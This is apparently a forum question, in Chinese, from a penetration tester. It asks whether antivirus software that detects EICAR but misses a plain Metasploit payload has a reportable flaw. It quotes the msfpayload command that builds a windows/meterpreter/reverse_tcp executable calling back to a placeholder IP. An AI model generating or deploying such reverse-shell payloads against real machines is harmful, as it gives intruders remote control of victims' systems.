作为工作站渗透测试的一部分,我将一个简单的 metasploit 有效负载复制到工作站上,并尝试运行它。通常这是由防病毒软件阻止的。但是,有时不是(我不会说出违规者的名字)。AV 软件正在运行并正确检测到 EICAR,但它没有检测到简单的非编码 metasploit 有效负载。
我的直觉是,这是 AV 软件的故障,应该报告为漏洞。但是,我想知道这种行为是否真的是有意的?是否存在“metasploit 不是病毒”的合理论点?
在这种情况下,有效负载是 windows/meterpreter/reverse_tcp 编码为 exe 文件,没有混淆。使用此命令生成:
msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe

